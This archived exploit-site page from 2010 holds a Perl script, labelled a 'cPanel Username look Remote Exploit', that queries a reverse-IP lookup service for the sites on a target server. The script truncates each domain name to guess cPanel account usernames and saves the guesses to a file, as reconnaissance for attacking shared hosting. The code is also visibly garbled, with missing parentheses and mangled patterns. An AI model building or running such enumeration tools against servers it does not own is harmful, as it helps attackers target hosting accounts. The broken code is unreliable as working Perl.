cPanel Username look Remote Exploit
Posted on 21 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>cPanel Username look Remote Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================== cPanel Username look Remote Exploit =================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #######################[In The Name Of God ]########################## #Exploit Title ? ? ? ?: ?cPanel Username look Remote Exploit #Author ? ? ? ? ? ? ? : ? PHC.IR #Contact ? ? ? ? ? ? ?: ?Net.Edit0r@Att.Net ? #Location ? ? ? ? ? ? : ?Iran #Code ? ? ? ? ? ? ? ? : ?[exploit code] ######################################################################## #!/usr/bin/perl ############################################# # Phc-Persian Hackerz Community-Security Team ########################################### use LWP::Simple; print " **************************************************** cPanel Username look up Keep priv8 ? * **************************************************** * Phc-Persian Hackerz Community-Security Team * * ------------------------------------------- * * by PHC.IR ? ?>>>>>>>>>>> (Net.Edit0r ) * * ----------------------------------------------- * * Greetz to : admin ~ M.Prince ~ N20 ~ inj3ct0r * ****************************************************"; print " Target to look up -> "; chomp ($ip = <> ; print "Output -> "; chomp ($out = <> ; print " [~] Save & Data .... "; sleep(1); $URL = "http://www.dedicatedornot.com/xml/".$ip; $content = get($URL); @name = split(/<sites>/,$content); $name = @name[1]; @name = split(/</sites>/,$name); $name = @name[0]; $name =~ s/<site>//g; $name =~ s/</site>//g; $name =~ s/www^.//g; $name =~ s/^.com//g; $name =~ s/^s+//g; open(IP,">site.txt" ; print IP "$name"; close(IP); sleep(1); print "[~] Parsing Data ... "; chomp ($data_file = "site.txt" ; sleep(1); open(DAT, $data_file) || die("Could not open file!" ; @raw_data=<DAT>;? foreach $res (@raw_data) { chomp($res); $line=$res; my $new_line = ?substr( $line, 0,10); #my $new_line=$line; $new_line =~ s/.//g; $new_line =~ s/^s+//g; ? open(DA, ">>$out" || print "Can't Open File. Try chmod 777 directory<br><br>"; print DA "$new_line "; close(DA); } open(add,">>$out" ;print add "Tnx to Net.Edit0r";close(add); print "[~] Done . " ######################################################################## #Greetz : admin ~ M.Prince ~ N20 ~ inj3ct0r ~ AGT ~ H4M3D ~ reglight #Note : IRANIAN ?HackerZ ######################################################################## #www.phc.ir (Phc-Persian Hackerz Community-Security Team) ###########################[Net.Edit0r]################################# # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-21]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>